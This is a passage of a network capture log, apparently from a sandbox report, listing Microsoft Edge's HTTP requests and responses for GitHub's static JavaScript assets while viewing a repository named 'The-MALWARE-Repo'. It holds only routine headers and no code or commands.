sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A12F8D41"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 1582155
x-served-by: cache-iad-kiad7000168-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 8963, 29711
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0bb5736f919155ddd8ba6beb2efc23cdecae56d6
content-length: 3284
GET

https://github.githubassets.com/assets/element-registry-be4dfc8273c2.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/element-registry-be4dfc8273c2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 15:49:05 GMT
etag: "0x8DCDD7995CD5903"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 767958
x-served-by: cache-iad-kiad7000065-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 43, 28905
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 2956f33283c0de6d7db0eb4eefb384847d483568
content-length: 4298
GET

https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-037ad60-8582b70cd5a9.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-037ad60-8582b70cd5a9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 13 Sep 2024 14:50:55 GMT
etag: "0x8DCD403787FB10E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 894123
x-served-by: cache-iad-kiad7000070-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 34529
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ec070d38fe1064eb93686c4e7c87d28c09087b79
content-length: 3971
GET

https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A0C3D76A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2176136
x-served-by: cache-iad-kjyo7100087-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 4570, 29966
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fe109a3c574f3f452c914fc0006d279b692f3063
content-length: 2385
GET

https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 16:52:10 GMT
etag: "0x8DCDD8265CA851F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 846232
x-served-by: cache-iad-kiad7000079-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 28, 32270
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cc10988a09403b5b50159bde4f2ca1fe1e612c03
content-length: 3288
GET

https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 03 Oct 2024 14:48:22 GMT
etag: "0x8DCE3BA6DAC4270"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 173456
x-served-by: cache-iad-kjyo7100161-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9, 7538
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 76bfa7be3e3aa4c37c4712029c432290b7bf159a
content-length: 5763
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 23 Sep 2024 19:06:40 GMT
etag: "0x8DCDC02DAFFB363"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 1018799
x-served-by: cache-iad-kcgs7200030-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 1, 32915
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 06aa7266fbf3d8a590942f3a98eae2c155bee998
content-length: 8031
GET

https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:14 GMT
etag: "0x8DCB7D5A13B8DA9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3384557
x-served-by: cache-iad-kjyo7100041-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 13062, 30902
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d4dbbe8a4970af4aa8b9e3b958278a33625d665f
content-length: 18641
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 07:22:44 GMT
etag: "0x8DCDD32D992EAF2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 894123
x-served-by: cache-iad-kjyo7100109-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 34756
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7a19ac6e00f17a8997d0abdca67f341a77990327
content-length: 4344
GET

https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A12F3F7D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3401900
x-served-by: cache-iad-kcgs7200153-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 9911, 29983
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e263dd52161f0c228fda6cc4f1635eb681644c08
content-length: 3816
GET

https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 23 Jul 2024 20:26:52 GMT
etag: 0x8DCAB55C9E02677
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 3454549
x-served-by: cache-iad-kjyo7100169-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 28, 30054
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ae579ba187bc6873f71ee7a165c3691c60ddd61c
content-length: 4852
GET

https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 16:52:10 GMT
etag: "0x8DCDD8265CE7852"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 846232
x-served-by: cache-iad-kjyo7100070-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 28, 32465
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 94ae0e30c74fbe3fd4b06335e4862a49e63a6955
content-length: 12728
GET

https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-3f4401350bd7.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_updatable-content_updatable-content_ts-3f4401350bd7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 06 Sep 2024 21:21:16 GMT
etag: "0x8DCCEB9D7EDF3B8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2154473
x-served-by: cache-iad-kcgs7200084-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 10, 30509
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 93c0fce10289c8f9d0aa323a8f706e6d6588b6d5
content-length: 4527
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-ab87c1d6c5c8.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-ab87c1d6c5c8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 07:22:43 GMT
etag: "0x8DCDD32D912D96C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 894123
x-served-by: cache-iad-kjyo7100135-IAD, cache-ams2100121-AMS
x-cache: MISS, HIT
x-cache-hits: 0, 34830
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cd7b0bb8d1346d8264263b3c4bc64525f8526f78
content-length: 4742
GET

https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 05 Aug 2024 19:46:33 GMT
etag: 0x8DCB5874F6AEC62
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 5174519
x-served-by: cache-iad-kjyo7100097-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 12281, 29925
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a139f1880084be215ff1dcb00422ae067d4ad8af
content-length: 3364
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-6faacedf87fe.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-6faacedf87fe.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 22 Aug 2024 20:39:07 GMT
etag: "0x8DCC2EA7844F9E3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 2193347
x-served-by: cache-iad-kjyo7100115-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 8499, 30080
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 42bbcd3846b865ec907e342fa2c862a07e81d654
content-length: 3083
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 27 Sep 2024 21:28:58 GMT
etag: "0x8DCDF3B65ED52EF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 662956
x-served-by: cache-iad-kcgs7200114-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 38, 25680
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 59ad66ba7ecc9f8ce952cfef27cdf871129c7d03
content-length: 6049
GET

https://github.githubassets.com/assets/behaviors-f5e67dbe7c99.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/behaviors-f5e67dbe7c99.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 04 Oct 2024 13:36:47 GMT
etag: "0x8DCE47997EDAAD4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:06:04 GMT
age: 92958
x-served-by: cache-iad-kiad7000122-IAD, cache-ams2100121-AMS
x-cache: HIT, HIT
x-cache-hits: 6, 3920
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 80b91b8fda6e16104d3c735a9dcc029ee052a503
content-length: 60515
GET

https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:12 GMT
etag: "0x8DCB7D5A07BFBE6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
